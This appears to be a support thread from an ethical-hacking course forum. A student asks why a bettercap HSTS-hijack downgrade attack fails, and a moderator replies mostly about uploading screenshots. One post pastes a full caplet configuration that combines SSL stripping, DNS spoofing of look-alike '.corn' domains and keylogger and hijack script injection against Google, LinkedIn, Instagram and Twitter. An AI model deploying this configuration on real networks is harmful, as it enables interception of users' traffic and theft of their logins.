Tagged: 

Viewing 15 posts - 1 through 15 (of 41 total)
  • Author
    Posts
  • #89647
    lucmarrouche
    Participant

    Hi,

    I am having a hard time with downgrading https to http using HS…, the result says “not enough hstshijack replacements (got 9).

    #89888
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Avoid asking the same in different threads please.

    Can you share a screenshot of the error please?

    Thanks!
    Diego

    #89892
    lucmarrouche
    Participant

    Hello Diego and thank you so much for replying back, here are some pics of the process, these sites arent going from https to http.

    #89893
    lucmarrouche
    Participant

    here pic 2

    #89894
    lucmarrouche
    Participant

    and pic 3

    #90112
    Diego PérezDiego Pérez
    Moderator

    Hi!
    The screenshots weren’t uploaded, they are too big. They need to have a maximum size of 1MB. So try it again.

    Greetings!
    Diego

    #91752
    lucmarrouche
    Participant

    Hello Diego, did you receive the pics for the https to http, I am still trying to figure out why it isnt working, thank you

    #92229
    Diego PérezDiego Pérez
    Moderator

    Hi!
    As mentioned above they weren’t uploaded because they might exceed the 1MB limit size, so you need to resize them to be able to upload them. Otherwise upload them to google drive and share the link here.

    Greetings!
    Diego

    #93118
    lucmarrouche
    Participant

    Hi again,

    Here is a better and more recent screen shot

    #93352
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Unfortunately that screenshot is unreadable, it might be better to upload the to google drive and share a link here.

    Greetings!
    Diego

    #93355
    lucmarrouche
    Participant
    #93564
    Diego PérezDiego Pérez
    Moderator

    Hi!
    No, it doesn’t allow me to see it, change permissions of the file to Anyone who has the link.

    Greetings!
    Diego

    #93772
    Diego PérezDiego Pérez
    Moderator

    Hi!
    You need to share the info here in case someone else (I meant someone from zSecurity team) looks at your question. Just set the permissions as I mentioned above and we’ll be able to see it.

    Greetings!
    Diego

    #93774
    lucmarrouche
    Participant

    # Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack

    # Domains assigned to ‘hstshijack.targets’, ‘hstshijack.blockscripts’ and ‘hstshijack.payloads’
    # variables get precendence over those assigned to the ‘hstshijack.ignore’ variable.
    set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com, linkedin.com, *.linkedin.com, instagram.com, *.instagram.com, twitter.com, *.twitter.com
    set hstshijack.replacements google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
    set hstshijack.ssl.domains /usr/share/bettercap/caplets/hstshijack/domains.txt
    set hstshijack.ssl.index /usr/share/bettercap/caplets/hstshijack/index.json
    set hstshijack.ssl.check true
    #set hstshijack.blockscripts example.com,*.example.com
    set hstshijack.obfuscate true
    set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js
    set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com

    set http.proxy.script /usr//share/bettercap/caplets/hstshijack/hstshijack.js
    http.proxy on

    set dns.spoof.domains google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
    set dns.spoof.all true
    dns.spoof on

    #93955
    Diego PérezDiego Pérez
    Moderator

    Hi!
    That looks like the original hstshijack caplet, as mentioned in the course you need to use the custom one or the attack won’t work. I suggest to download and import custom kali which already has the custom caplet. Then try the attack again.

    Greetings!
    Diego

Viewing 15 posts - 1 through 15 (of 41 total)
  • You must be logged in to reply to this topic.